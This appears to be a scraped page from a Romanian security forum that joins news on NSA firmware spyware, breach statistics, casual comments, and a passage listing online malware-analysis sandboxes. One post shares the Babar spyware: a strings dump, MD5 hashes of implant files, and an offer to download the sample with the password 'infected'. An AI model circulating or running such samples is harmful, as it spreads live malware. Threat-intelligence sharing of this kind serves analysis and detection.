Aerosol

Compania rusa de securitate cibernetica Kaspersky a descoperit un program de spionaj american pus in HDD-urile Seagate si Western Digital. In ultimii 5 ani piata HDD-urilor a vazut cateva modificari importante si numarul a scazut de la 3 producatori la 2. Din acest motiv umbla cateva suspiciuni. In prezent avem doi mari producatori americani: Seagate si WD. La randul lor acestia au preluat si alte divizii precum Hitachi, Samsung, Toshiba sau HGST. Potrivit Kaspersky, agentia americana de supraveghere cibernetica NSA a introdus in HDD-uri un cod de spionaj. Acesta executa datele primare, fisierele la nivel inalt, sistemul de operare sau chiar utilizarea HDD-ului. Kasperky a gasit in PC-uri din peste 30 de tari acest program de spionaj, iar cele mai multe au fost in Iran, Rusia, Pakistan, Afganistan, China, Mali, Siria, Yemen si Algeria. Ha! Seagate si WD au negat partajarea codului cu sursa firmware-ului cu orice agentie guvernamentala si au sustinut ca firmware-ul lor este proiectat pentru a preveni sustragerea datelor pe o cale nefireasca. kaspersky a afirmat ca este destul de usor pentru agentii sa obtina codul sursa al software-ulu dandu-se drept un dezvoltator de software. Guvernul poate solicita codul sursa prin simpla rugaminte a unui producator care are nevoie pentru a inspecta codul pentru a se asigura ca este curat, inainte de a putea cumpara PC-uri care ruleaz HDD-urile lor. Ceea ce este surprinzator este modul în care a fost violat firmware-ul HDD-urilor si cum a ajuns raspandit atat de repede. Seagate si WD au facilitati de productie în tari precum Thailanda si China, situate în zone de înalta securitate pentru a preveni furtul de proprietate intelectuala sau sabotaj. Nu ne putem imagina firmware modificat fara o colaborare a companiilor. Source

Potrivit analizei The Global State of Information Security Survey 2015, realizat? de PwC, în 2014 num?rul incidentelor de securitate detectate a crescut cu 41% în Europa, cu 11% în America de Nord, în timp ce în Asia s-a înregistrat o cre?tere de 5%. America de Sud este singura regiune care a înregistrat o sc?dere din acest punct de vedere, de aproximativ 9%. Num?rul total de incidente de securitate cibernetic? detectate în companii în anul 2014 a crescut cu 48% fa?? de anul precedent, atingând 42,8 milioane de evenimente la nivel global, iar pierderile cauzate de astfel de incidente au fost estimate la 2,7 miliarde de dolari, în cre?tere cu 34% fa?? de anul 2013. Source

@SynTAX partea cu salariile e si vina angajatilor, sunt invatati sa taca ca de nu sunt concediati ( au intiparita in minte, ideea cum ca pot fi inlocuiti oricand ) intelegi tu? Daca tu ca angajat al " RCS & RDS " te-ai duce sa iti mareasca salariu risti sa iti pierzi locul de munca si de asta lucreaza pe un salariu de 8 milioane. In general esti invatat sa taci ca de nu iti pierzi locul de munca, ceva de genu: " Patronu nostru e stapanu nostru "

Sample of the Babar malware discovered by NSA. It is believed to originate from French intelligence. More info: http://www.spiegel.de/media/media-35683.pdf Cyphort » Blog Archive Babar: Suspected Nation State Spyware In The Spotlight - Cyphort yara rules: [YARA] Barbar/SNOWGLOBE Rules - Pastebin.com babar.exe Strings: !This program cannot be run in DOS mode. `.rdata @.data QVVVWVVSV PSSSSSSh PSSSSSSSj ^tLHt-Hu uS9F`u%V QQSVWd <\tM</tI HtHu4j s[S;7|G;w tR99u2 0A@@Ju 0SSSSS HHtXHHt >If90t 0WWWWW j@j ^V <at9<rt,<wt URPQQhl >=Yt1j u[SSSP t"SS9] ;t$,v- UQPXY]Y[ 0SSSSS 0SSSSS PPPPPPPP PPPPPPPP ^SSSSS j"^SSSSS tGHt.Ht& ^SSSSS 8VVVVV >:u8FV VVVVVQRSSj t+WWVPV /u /i:-" /c start /wait 1000 && del ComSpec cmd.exe DLLPATH D:(D;OICI;FA;;;AN)(A;OICI;FA;;;BG)(A;OICI;FA;;;SY)(A;OICI;FA;;;LS)(A;OICI;FA;;;AU)(A;OICI;FA;;;BA) advapi32.dll CommonProgramFiles ALLUSERSPROFILE COMMON_APPDATA WINDIR USERPROFILE APPDATA kernel32.dll Shell32.dll kernel32 IsWow64Process EnableLUA SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ %%%s%% /s /n %s "%s" %%WINDIR%%\%s\%s regsvr32.exe System32 SysWOW64 Wow64RevertWow64FsRedirection Wow64DisableWow64FsRedirection %COMMON_APPDATA% =j&&LZ66lA??~ }{))R> f""D~**T V22dN::t o%%Jr..\$ &&Lj66lZ??~A 99rKJJ ==zGdd ""Df**T~ ;22dV::tN $$Hl\\ C77nYmm %%Jo..\r >!KK 55j_WW &Lj&6lZ6?~A? ~=zG=d "Df"*T~* 2dV2:tN: x%Jo%.\r. t>!K a5j_5W ggV}++ Lj&&lZ66~A?? bS11*? Xt,,4. RRvM;; MMfU33 PPxD<<% Bc!! 0 ~~zG== Df""T~**; dV22tN:: xxJo%%\r..8$ tt>! pp|B>>q aaj_55 UUPx(( cccc||||wwww{{{{ kkkkoooo gggg++++ YYYYGGGG &&&&6666???? nnnnZZZZ RRRR;;;; [[[[jjjj 9999JJJJLLLLXXXX CCCCMMMM3333 PPPP<<<< ~~~~====dddd]]]] ssss```` """"**** 2222:::: $$$$\\\\ 7777mmmm llllVVVV eeeezzzz xxxx%%%%.... ttttKKKK pppp>>>> ffffHHHH aaaa5555WWWW UUUU(((( BBBBhhhhAAAA ='9-6d _jbF~T 11#?*0 ,4$8_@ t\lHBW QPeA~S >4$8,@ p\lHtW +HpXhE T[$:.6 00006666 CCCCDDDD TTTT{{{{ ####==== ffff(((( vvvv[[[[ IIIImmmm %%%%rrrr ]]]]eeee llllppppHHHHPPPP FFFFWWWW kkkk:::: AAAAOOOOgggg tttt"""" nnnnGGGG VVVV>>>>KKKK yyyy YYYY'''' ____````QQQQ ;;;;MMMM ccccUUUU!!!! bad allocation Unknown exception bad exception EncodePointer DecodePointer FlsFree FlsSetValue FlsGetValue FlsAlloc runtime error TLOSS error SING error DOMAIN error An application has made an attempt to load the C runtime library incorrectly. Please contact the application's support team for more information. - Attempt to use MSIL code from this assembly during native code initialization This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain. - not enough space for locale information - Attempt to initialize the CRT more than once. This indicates a bug in your application. - CRT not initialized - unable to initialize heap - not enough space for lowio initialization - not enough space for stdio initialization - pure virtual function call - not enough space for _onexit/atexit table - unable to open console device - unexpected heap error - unexpected multithread lock error - not enough space for thread data This application has requested the Runtime to terminate it in an unusual way. Please contact the application's support team for more information. - not enough space for environment - not enough space for arguments - floating point support not loaded Microsoft Visual C++ Runtime Library <program name unknown> Runtime Error! Program: !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~ CorExitProcess (null) `h```` xpxxxx UTF-16LE UNICODE Complete Object Locator' Class Hierarchy Descriptor' Base Class Array' Base Class Descriptor at ( Type Descriptor' `local static thread guard' `managed vector copy constructor iterator' `vector vbase copy constructor iterator' `vector copy constructor iterator' `dynamic atexit destructor for ' `dynamic initializer for ' `eh vector vbase copy constructor iterator' `eh vector copy constructor iterator' `managed vector destructor iterator' `managed vector constructor iterator' `placement delete[] closure' `placement delete closure' `omni callsig' delete[] new[] `local vftable constructor closure' `local vftable' `udt returning' `copy constructor closure' `eh vector vbase constructor iterator' `eh vector destructor iterator' `eh vector constructor iterator' `virtual displacement map' `vector vbase constructor iterator' `vector destructor iterator' `vector constructor iterator' `scalar deleting destructor' `default constructor closure' `vector deleting destructor' `vbase destructor' `string' `local static guard' `typeof' `vcall' `vbtable' `vftable' operator delete __unaligned __restrict __ptr64 __clrcall __fastcall __thiscall __stdcall __pascal __cdecl __based( GetProcessWindowStation GetUserObjectInformationA GetLastActivePopup GetActiveWindow MessageBoxA USER32.DLL !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~ HH:mm:ss dddd, MMMM dd, yyyy MM/dd/yy December November October September August February January Saturday Friday Thursday Wednesday Tuesday Monday Sunday SunMonTueWedThuFriSat JanFebMarAprMayJunJulAugSepOctNovDec CONOUT$ `h`hhh xppwpp RSDSa2 c:\Documents and Settings\admin\Desktop\Babar64\Babar64\obj\DllWrapper Release\Release.pdb DeleteFileA GetModuleFileNameA GetEnvironmentVariableA lstrcatA lstrcpyA GetShortPathNameA LocalFree CloseHandle LoadLibraryA FreeLibrary LockResource SizeofResource LoadResource FindResourceA KERNEL32.dll GetProcAddress GetModuleHandleA GetCurrentProcess WaitForSingleObject GetStartupInfoA RtlUnwind GetSystemTimeAsFileTime GetCommandLineA GetLastError FindClose FileTimeToSystemTime FileTimeToLocalFileTime GetDriveTypeA FindFirstFileA TerminateProcess UnhandledExceptionFilter SetUnhandledExceptionFilter IsDebuggerPresent HeapFree HeapAlloc RaiseException GetModuleHandleW TlsGetValue TlsAlloc TlsSetValue TlsFree InterlockedIncrement SetLastError GetCurrentThreadId InterlockedDecrement WriteFile GetStdHandle GetCPInfo GetACP GetOEMCP IsValidCodePage WideCharToMultiByte ExitProcess DeleteCriticalSection LeaveCriticalSection EnterCriticalSection MultiByteToWideChar ReadFile SetHandleCount GetFileType SetFilePointer FreeEnvironmentStringsA GetEnvironmentStrings FreeEnvironmentStringsW GetEnvironmentStringsW HeapCreate VirtualFree QueryPerformanceCounter GetTickCount GetCurrentProcessId GetFullPathNameA GetCurrentDirectoryA LCMapStringA LCMapStringW HeapSize VirtualAlloc HeapReAlloc GetLocaleInfoA GetStringTypeA GetStringTypeW CompareStringA CompareStringW SetEnvironmentVariableA InitializeCriticalSectionAndSpinCount GetConsoleCP GetConsoleMode SetStdHandle FlushFileBuffers CreateFileA GetTimeZoneInformation WriteConsoleA GetConsoleOutputCP WriteConsoleW SetEndOfFile GetProcessHeap FreeSid CheckTokenMembership RegCloseKey RegQueryValueExA RegCreateKeyExA RegOpenKeyExA ADVAPI32.dll .?AVAutoPathHelper@@ .?AVIAutoPath@@ .?AVCImportSddl@@ .?AVCAbstractImport@@ .?AVbad_alloc@std@@ .?AVexception@std@@ .?AVtype_info@@ .?AVbad_exception@std@@ abcdefghijklmnopqrstuvwxyz ABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyz ABCDEFGHIJKLMNOPQRSTUVWXYZ om]+F` 7TH,H{ 1DL>[l :#;5d2 =U|%F' v#bN<st( aXp|Na9: tX/gk= hsH(~X LARFP< [s'Na5 hS~9p8 aqUpIe2 F!ih,: xp2s.z 95X"K5;oR/ jxaTv(B w_]@E&7 \yvVo} 1MBd#$= <jQCJ-0 [|.1Ln {e.*6b aFC5&. <_QR?. :@AiXm aAR)sDm GS>,Jy] 4C`JB5 DuH\zB *67uxR gNU$=oA ?]Ci<}N ]G&b(HG J<{5RJ _N[+H{ CF0qwL gb>wbY Y8L~}R <VRYb! \*sQ#9\ PygEc~ mcMtmh4a t`.a7?{ H[mN] |I1hC:c sc,c?o 0>3&Ol S9\fu/ OU{Wa) 8D@49` F&Hh74Z @I?,$> ]<~6F7 {I||I| i4@,K<Yoz,%> t7zG.+ aaR:kqF *vK/Y\ [4'-]h AX#xoF P,7'x* 7kE2. 9 -5,2 ZRse`Wg x'Z$p9 &ze;@n \F4~[&s Vo$R+ @%csxA@q 5a&M M MBCU0;| ]sI$Uf g?]IBADa 0e)3 p [EC1iF4tf Wg1B+: a5['n!D ol$'iHJ u&pf;# [B`t# .Ue&N1/ Il`C$e $NH0tg Ur9L!. nbLS0tx P(<L| "`A/2Q Vo`9!v zVma+K >WwsLP D'ezQ|0IgEp {q!"9v~ l(XB.U8 Z@{iq=fK 8z0!$/b? )*>.<x b1c4ap$ )c82q7 ^R*aa; On~T^[ }Rg+#w dxO|Y<H77 9UjZ|Wmv gu3Z?@ ;Y[mHj hR%&Bvz ~q5EpLP EQ418DVi6 }4Hj,; 2;(#5 w|=p{-fa nwdF,F6 Ec|S@= qT,Mz# .E Y)F utG`)p |69z!Z {.V>nV- +1(|$Cx4\ v9%H#] ,9@7SD1& _l<<W/r lE R:! FY?F*& f/0#n] e~%JT5 gHS ((7` 79l#fO 4$gFMN1 /9ba7f )+dEzS St:%H~8 Beh*w^e: p&7.^j\ l}4/WdU l]]]Ve c4\]Wj L-at.6 *CVr__ q6|lYN `h6VwJ +/B!NI$s pJ-^c9 k}$a)_ +,kyEsz *Kw,Fk S=#yjQ \nh9gy ^rX9"= I)`Y4> a-t8-E 242/OL Crn#]ZN BNo5O( {xp|S, K4y=v*z K;\|<^h 1syS,f En=_O@Z qW+rEV Hm]z5g (NF!K\+ %aH<`P 65%}sfihgzYQ *i{P9Gh C+E'r0@ !ux!l" [-<]]mI: yG <M*=y W@f:1b Ahh*k~a Aw[qq4 i`p8]4 |kLeXf >Trs@":;Cs yQ;J0OL ^(J<1^ vyM]}OZ V?;;d7g n/M_1r |#U_I_ ~eI.zd Br_kmi )w<7`rl |f%q /i|T$K Bmy5>n -lyV>= NHceu} Ut<K[7 DSJ.)" wY-K$4 o5dAf4[yTVVZo!I F\tzQ:D d>0_Qt ul_""M AV'rS8x ,MB:f$ S&~wV8 Se@(,R 8s,FBw %oO{l^ ni{)s9s >,3B^y MQmIFSn ]NTgbX >*aZgs KZzKQmvXI n`oH`3 TjyG6ln 7b-A< %NN{`QX PyN~-V RtnvAg 4cW{ht xgkdtG 6fq,L] RIX*d@ oaaE!7A 3t}[J~ S]N7VF cRGm}Ox OY:l]0 XTd2_y j?jb.! L@"{bi^ wRJZu@V [A{&QE1 SHXw?" \osz`F )2[cNmD: UIf eU Yxf+A)Yt ;%,_yK(XK SOU)!= `<mQ+_ '=[ZE<}8 jE"c{T <^28,I {M R[% sCfslwS, ]42H5c= nuig| tHLYk! "KZVlc "H/$i5 r+c9c 7 x1GeiAjzX &`!ZH5 Q|hKYk oJ{e+y 1rQC;} (W<]}%TXL G|0D+O vR3Da/ S@-doG& B=srce rH<tZ|7 ,iRiOH yQDJ4Y ~burG\ G'orq'B 8 mtn/ T.P#a* hMZo2% VxILR; >L$8u\l !g$t"c TyxT+- ^.)W\W FDPAmqh qil@m hWvBCY M?,3p] |%YxeFlA '.`~7Or Jkb=(> Zht#P Oh]b6~ $t@gE} T~}V#b #Ab{Yu 7chi#/ z$8P-y#> 4+NQF 9.0S"a5 +Q*']Y& @})tsT.,I z\!yc0V Hy37Bp f?BD{'U{ =!^* L.dBZaJ @(B]`M cF(Skm 1bQ*x~m 8uc!Ds |!0QP_ _DJ"'A 9}{mJ#RQ P2b(C?C '4-0GO F##STX4 $N=0LtT? 8,^20N 2E;k:m %CC+"_^ /|LPyk} |7#6|y Yy-/8J hQ[XGN^ u[1Myu 1iq"b[ 6xGZyW GU zBX !YS@MUu nF^#ZL?o KLkFE{ Bp:?HUU {B7R=} /q=q|C %F7f|y o*K+%Z} <~(1jF` '(B$mH }%dXe[ 'Dv>) (Ssm` cl~tRn cEkH%B %V&pQa|6A zu<XN' IX?Q = [jWW|d %-&!yn KHm0fKq ,(!U0f aUsw;# \[6BmR l@@Jj/ #Eha[= &EbhET M5%>.6 `\^Q|U{ d.afS= 0uHk]P 9;Y[+{\+ 8rXcHb }noHG8 f+tteo Do{VN* u$"+EJiW -}{}m:* R<CN[WL s%rg;Y V\h [Le Cv?urg aAslMr0 {kt')~ "x<A[4 5Y1#h} s'8]w 7c~t`W S*tJj.* 4ImD1 `Q2\xD w{x0^5 {~9rDXaL *7_S.GY {y@B3< AC]=i& _@Cl&N /%WYdp+3; >)N[lt& H8:A,1'\ K_(!g& pSh[Ue "$xMHs .2ev_c F$G Tu S|f?aVk\ C(G2qw6 X-3F(| jy#tma qYD1v#M 5ayCi_ "eiRc\k bO5*&| TAh5,:m aj#uN` l]Uw:| lMIEf:Bk"Z Xe"Z`iqM ,G"qao 8Dt4>& bf>BdN L9\'sN d|2Us!V @&{[b .B|O[- Z/[)t0 /DKX^E?4 &Ll~iX 6wD:]- eJ%qb'W p!Cj!nY s}p>6y V%cAsx $,IM 1D{Kq/ Rz"BM| JZ{0o# V?M?!b tV\"j)OY OLm]%& PpCSdy Yh /X% E*AO-s>@ e)R60L m'C&g\W4 4p=zBm dWWH1hv 7^[HxB oS'"fk+p ~Qv>Cx ;g+lVh }7C-? k?=Hl. sI<gvs aUJ=L+Z y$#Sc|b R_C\(G Aq)>dv( {_v==\r< @#fQ]5 `9t(F5dE-U u0-BXe8 rRo4jb B>B40e fCg;U8 A});@] +E9c[= EhP1%t !NI]&[ w]qK~6X 5P7<'M<cz MDhiW] 7$-' SuAr#JqC 8*0Tn{K Gp{?5a `[W Ux /Rg.se }U9BMp4a( 8;GH~J xP*v~$ GAg`Va N2M`vvF y5wx} D59;ql LKE97_F :\S5n;mJ* vd6XI0 l1x"yExe &F0I" #T!)/Ygfm V=@-<8 Oi)Jcx ~t/"Kg Y7\`]! *i:*$: 7,^"|;n;" #Ie6{n `1ZACjq v1\CZJ $vQg)s YG]#!.x NqB<eH P1Ncr! RsR F>XJ{j .Ss@*W |S4KAS4JL <sEb.y9 .\vuPP .PFNTZ )`*lEG j&>mgQ` |$g~%8 ms$9"P O)3EltW C5 ;b@ n=zyMV; ^CodcK+\h jSC]>m& ChdkjOy q>Z]\% ?X*rX] p['iO\ 3(4bu?;L |nD?@ E=d?h&y ]?&xAF XO 4LL ~EoCT: ihhK&- kz+;t~ c]xE]; p})t v<gD5K !:eI019 r,A:{k VSF8$9H })58II Fgea;7 hsKWOZ R+3E,= R51/`*$8B xS%ls9 ;^a\wM[ Ovv1t}x 5nMlVDI P@t<;1QhR 5u?4nH LjqB>: 6jMDJH VqO^<b 6'u @ML 23HO#@k =V%+'# |_D$Z>4 ia_[pI *Ivv/2L ?[`5&X 9~u3S]_ {[~{gl5 W?!7\~ R-OoMI =bTpWdf <kGN\}V<d |O)k{Oc kT!NUrO R{9^v5 k(+/$Z <.3Z"Z lK\-0m, 0#jQiI KJEpkq3 Rs.'F} .0(K YQ Us_Ycy M# 5od 4d_sj\ }_ag%J q~""4i bhV94' `nzs^R FFL=lX ,d@!?tU #*_PUv! NcJ@gC$ wlRds kcQiE5 oLN\G!+ QW'U~F XPt|e, 7XV8*B z*j7G5 1fyncl ; (SXscZ Q:6Li v%3Dj(S| $3Q6r( YUL(un `*?'gT s~+Tth NbX2? P&`*k% ]RS=O6g; r[W+r8 #GC%)O wRqA:k` V|>bBu QaIQ8E VyI!cZW pv{7S]1 a[n350p HPZ=K b=LAil %=\$(F Kgy#S V,VmNN :x/n#} .=WPoDT &NA?;G] B@v'jR> <.B^Cx<| ,*X"d? &~KT`7 xFQny$t d.'VR 5Q@R`INv CW4p } 1A$B&O ;zl.3G W~qJ_-A &'4^LDB c{3+$nl 0RD&_aw 2r_ust +\9f>c R-H,E7D w&]^$i jovO@K gDWb{V (V{l`? e{.t4j21 MZMVKK A_lynd .4j{l[3R {[@r y}wQe}t )g=l'%* "'%!}'||X YACH7* uZ90*Q +B`loW [f@r<M 4T<S6e}? x&C4PFV _9dB1GK8 !@BXpU AM9P7?R q*=?^Jm (M#l%n r7=eB?D )xB5vab`l Ke8Cdd\ ot]Rwyc go"Qu& <Ygcre DXW&2<U !#(m|2^# NSrST*w iXn,C% FAJhSJ F\qHxg >nV~6|- ]o<Jk:D q[{U&zTO shS|Ip axI}F6 \0)=}/5 b-P?3Z7 HQq'qM -w#2Sn BQ:^* &sb+rx ?jAQm{a 5Pc|kZ !MMc3n$ ~Kl+-o4 ko|;&? btGtAf~^E 9+8Kvl G4ts=d h*k?N;8 pL;`Z*_ GOE?-6 X8D0^.u ^;$"4+ ]Fe}9> E8aS&. jx['o o>2Up;* >_~_lp fT<l&*$ );IG F;!S=I uzLVdVi ;7Cxw6 f~2:]3 nQxm@c vk_5B}` FfVxK/? 8,G)(O/cH f4qv/ss~&I} 8?Bs*I/ -a"v5V ]B#{(|w SG(*2k `t:K+V Ge9nL y;}3bf ziNxb < 4hGY BZ}WH\& TQ3~`{ DkgM[U K%ZDp* l49_,)h h?bn"@jPC* 0Uq'?xd :%A4jD $zjj1Xgs aID}m> SpA?3]G.B LsR}T7 ?bMny} U6{ #~ M.]@Eff jzwkeP EbXQH )^ag_" q+:*o: u<&e<( DH?-lZGB }<[~%a ,{oD5) ]}/"`3 pV3t{h ]:e=[7- 1P+U2N Yiv4a3 :'B:X@ eX7tau ;,-{?h KV-/E5 cUMHT' :>%F>N+ |XtPKK |>yPzl bhcbG- c&7MjEW 6pi}a@ hcYW2= DXeW:ZD]=W6 s{QJ"5t# 2,Ft@ D(DJ<J )m 5(S 4 N\D5!( ggI XFD ayWfItuq] !l1Fz% ]6D%(86 azDO/c _7q9P> H,GLfH 0hPQug) uuM,, :fE{/F- |#aG\' _)w?~z }O0m76 x0%it[ Z94l%H |?a-H! A60]0\^ F;mn&U">nIq sb 1Gz 4c~,1,1H. Uh/ST2 #P% ?*. b%4e(?8 $u7e_NN ?o]@8%7 +n`9W ^\9~kdMR "]p1a= 2co{}C)d' YWN-QE cNUx,M% FfMVo!m EA"q#g W||2j: &:45g6 ez7*2p% FYjSYvfv bC"x1A i|~}]" Pvk[=`o~L& pfSvdQ a*wqF\A G\'nJ| 0K@B9~ O<|49 EY7!v: +,YUJ| khP<&3 tsV){O 468DF}#= fxS{}od Q74Wrr Mq/!)O y]\_qB[ G)<yNz 5.P]Tm g_2al# k/RS7f%&8 vE~{ @ B)",Wu H[$121 ^/vYGF l1bifyPH <|A:E,Bdw /eSn8B )L~yQm Dmq\_yC= S>GC:Y oq"5Ug X8lJu& sBXzNV; v0lf-' \02X%O 4mv Oq Y/3hX~ Se_)E" =*D5%s jtD=u~`Q sHI^Bs L6T9GT I nSF^RH x]I:=B **{x;^ Q}/R:X St?mC$/ Y'N,?&Q l_@hz{ AZ&+{m pY5NwK c4)d%m T%f-`l r/&3E W~<7fa6 J{FpA 7`CPsT KT@Xr UL!V(Qa^ E&I)#t \<lToW- 9}N}k2E)~ \yHQ(D;] e1'S2~ A~6#)O C7Q#+H v[UHXQa= oQT="cw LHrD2 _#&gI2 #0w^`8 <TekU6 <nhO6(~_^ ndda?;8 7ogDC0 VD+}C{ ;rzZ}.@, lPo+ZV ;[## \@ @FImM3 'I81d+> MyxW^&"Y fs$[# `b:I;d OpRJB7% N}?yEQ &K?(7O;6 z!b N0 v38at$^v)* !l{K`HH K1s@mE O[% mzW @'{jMZ K@yzRn Nlkr%6 ? %Ko' K&u-l! Y-FutJ RAe3S D.2m} h R#GITXz[ R"]FFP *!r+G+7^ 1CC(.2 >p:b8? ,y'.WMI Iz0Ah:Z m>bRq} !u7[~/ \%f&E/\ 64V8SQ Iz?A*9 ($(ssw7L z;{m`n$ yI~*nk%A }rp"N*T \cFR#f?V j~oAtei XPuw3n 5!@E;> FEz:!a ~E3>&E. <+~P&- Lh7d'l h>f?M8' :el+&k `7vEaj ]3x]Su #_.;oT 1]2i. ~*p5s M)xEEE A-cplk ONR/WP ql )23 4E_w)[ }yuvqL 7!S_le O-@0Ew &4}rkF swlA5=@WZ "ji&K^ &BCbx#^m -eYu@j -w`2+V l&$Qsg fhebq- G=@4pA X6Hve5Z be8~x3vx LC'ym> $-nn?; /fh6.| V2W04y]] <l@P.;+ DQU',2iy 0G?pzkT {Xg-I gGQ!UO 0w^7_OxE 51Dj0F\f 71eaU6 %zQG7y M}=k<f> <ckf{f' Ait+Fx^b qsD}KB //:eX* !&,B&t <TGml [7}H7B ].tOq& PC5m\w15g _}uSt? =sI>_G<, _iEJ$6 )Un@KP %Dk$Of Kq#2}{ g7}[{|{ (~}=\G SPAL_D a'"Wc\p Hli/.ye ^v98Ee/ q~IxJN e=ra(B( xD0S,Y&s m<Z.(lI $g)caP l+6KHlw ~jD1Rb 7m:4Am =y$usj2@ AnL%K3 Z![7\ LWd| a sGe]j1F`Yz wYq5i& (byIZ- JnM3mR LKgL;M &7?AS^Y 5nPngW+bP _N'|pi"yU IMlNHq 9gyu(&l ?xU1yA ]>&22 @igsjX L1Exm}" v8z1!rm mK%GIK Lyjl@Dz 7RwpVSn O+`]ZB -aNg=` ON=k:v S.w2:+ djKg6-qt g< [)O i,~VB^ Y2`%$Xx Y[ukW{p+)<V 8(SF9&x >AAtF=+f wb1?CT JwpGPs+ EF*3~Q U7xnqPRj; 4.h06gg d&V?|P m\$Km+ rx7cH~r POSaU6 M7p&UH ;O5*g( n;qZqX 'Y4c\* |LFB,k Eoc0Z9 mU}G(c@ &)5-im }?C7Xv OkQ%t _uHi583 A~o/Jx$gH ~PH\5? A'a;BDM$S FM`&^h W'\l>l tu4#S$3C`d c)-B}f 5K) OY &h<<U k&gD7= o|9dGC sAv;*`,tK rH+%ww "Td-|4 NvHyqt H?DO1e <A: 03 "xH9Jw; PNpd20 a(Qh8kL ?}uxgU}8 `U_C({ =nl1@"'[ u2(S`U N*ek$~ ^!F}9Z +TB8\N pR(AK s:kGXF R2;93X NkGmH} 9e]{5- TBoyD2#5 *nu0gy :2I!%k~ $+s/U( kv:EHd bi3a[{ KERNEL32.DLL mscoree.dll (null) ((((( H h(((( H H MD5s: 48fe7f28.msi = 8ead84dd36d8f14ca98f7755a9f5a069 Barbar.exe = 9fff114f15b86896d8d4978c0ad2813d perf_585.dll [implant] = 4525141d9e6e7b5a7f4e8c3db3f0c24c update.msi = f2ccf4cccead21b1674d7df288722a3d wbemprox.log = 577b71cd95333f6df5bfc1fbc64d98ca DOWNLOAD Pass: infected Source

@Usr6 da bre fiindca se foloseste in companii, forte multa lume e obisnuita cu XP, daca ii pui windows 7/8 posibil sa nu se descurce desi nu e mare diferenta. + ca windows xp e mult mai ok decat win8 ( asta e parereamea ), probabil si datorita compatibilitatii unor programe e mai folosit XP fiindca e mai "old" oricum cert este ca top-ul a aratat ca nu numai windows-ul are probleme majore, se intampla si la apple, linux etc... LOL, acum am vazut ce procentaj mic are linux-ul - 1.34% ... //Ma bucur sa vad ca intr-un topic cu adevarat interesant activitate!

Hm cel putin funny povestea ta am ras cu pofta, cred ca 10% din angajatii de la RDS chiar au habar de ceea ce fac & restul de 90% sunt de genul ( am incercat dupa instructiunii, nu a mers, asta e nu avem ce face ) Mare pacat, aici fiind vina celor care fac angajari, ar trebui sa testeze personalul sa vada cum se descurca in anumite situatii. Nu sa angajeze doar fiindca vi si dai din gura ca stii x si y ( aici problema e mai complicata fiindca daca nici angajatorul nu are cunostiinte, cum poate sa-l testeze pe ala nou venit )

@Usr6 posibil si asta, dar totusi tind sa cred ca lipsa lui din top se datoreaza faptului ca "nu se mai intereseaza nimeni de el " Oricum din cate am vazut in top majoritatea vulnerabilitatilor ( pe windows ) sunt HIGH or MEDIUM, 0 Low, e cam dubios

@Usr6 probabil din cauza ca este depasit, desi este chiar dubios fiindca sunt inca destul de multi utilizatori de windows XP ( chiar si firme etc... )

si uite cum "Marul ajunge pe primele doua locuri" cat despre IE nu e nimic nou in asta, era de asteptat adica browserul este complet depasit. Like, like and Like, Nice share!

In this section, we’re providing a list of cloud automated online malware analysis tools that are not available anymore due to the website being offline or the service being disrupted by the creators of the analysis environment. Aerie : https://aerie.cs.berkeley.edu CWSandbox : The Sandbox | Understanding CyberForensics ThreatTrack : http://www.treattrack.com Malbox : Malbox System VisualThreat : http://www.visualthreat.com XecScan : http://scan.xecure-lab.com Norman Sandbox : https://www.norman.com/analysis Despite quite a few analysis tools being unavailable, there are still a lot of them being actively supported and developed. The online malware analysis tools that are still present on the Internet are presented below. Each of the tools has a letter written in square brackets, which is used later on to present each of the tools in a table in order to preserve space and provide clearer results. Each of the tools also has an URL address of where the service is available in case you want to submit different files for analysis. [A] Anubis : http://anubis.iseclab.org [C] Comodo : http://camas.comodo.com [D] Document Analyzer : http://www.document-analyzer.net [E] Eureka : http://eureka.cyber-ta.org [J] Joe Sandbox : http://www.joesecurity.org [M] Malwr : https://malwr.com/submission [MS] Mobile Sandbox : http://mobilesandbox.org [TE] Threat Expert : http://www.threatexpert.com/submit.aspx [TT] Threat Track : http://www.threattracksecurity.com/resources/sandbox-malware-analysis.aspx [V] Vicheck : https://www.vicheck.ca [X] Xandora : http://www.xandora.net/xangui Note that there are other cloud malware analysis platforms, but we didn’t take them info consideration in this article. Therefore, some of them are not presented and described below. Supported file formats and document types Since malware can be hidden in almost any file format or document type, malware analysis tools must provide support for such formats or document types in order to be able to detect the threat inside it. For example: if an attacker has hidden a malicious payload inside a PDF document, the malware analysis tool must have PDF support to be able to manipulate with PDF documents. If PDF support is not present, the dissection of PDF document will not be possible, and consequentially the tool will not be able to find malicious payload. If we look at the PDF document through the eyes of a malware analyst tool, the PDF document is just a set of random bytes. The attackers mostly use the file formats, document types and other elements presented below for including malicious payloads. The majority of presented elements need no further introduction, since they are used in our every day lives, but we will still provide a brief explanation of each of them. exe: Windows PE executable files normally used for Windows executable programs. elf: Linux ELF executable files normally used for Linux executable programs. mach-o: MAC OS X Mach-O executable files normally used for Mac executable programs. apk: Android APK executable files url: URLs pdf: PDF documents doc/docx: DOC/DOCX documents ppt/pptx: PPT/PPTX documents xsl/xsls: XSL/XSLS documents htm/html: HTM/HTML web pages jar: JAR Java executable files rtf: RTF documents dll: DLL libraries db: DB database files png/jpg: PNG/JPG images zip/rar: ZIP/RAR archived cpl: Control Panel Applets ie: Analyze Internet Explorer process when opening an URL ps1: Powershell scripts python : Python scripts vbs: VBScript files The table below presents supported file formats and document types of each cloud automated malware analysis service. The rows represent file formats or document types, while the columns are used for each of the automated malware analysis tools presented by one or two letters (as presented before). The ?is used to denote that certain file format or document type is supported by an automated malware analysis service, while an empty cell indicates otherwise. The * is used to mark that the support for document type is being implemented, but not yet available, at the time of this writing. Table 1: supported document types by different malware analysis tools Document Type A C D E J M MS TE TT V X exe ? ? ? ? ? ? ? elf * mach-o ? apk ? ? ? url ? ? pdf ? ? ? ? doc/docx ? ? 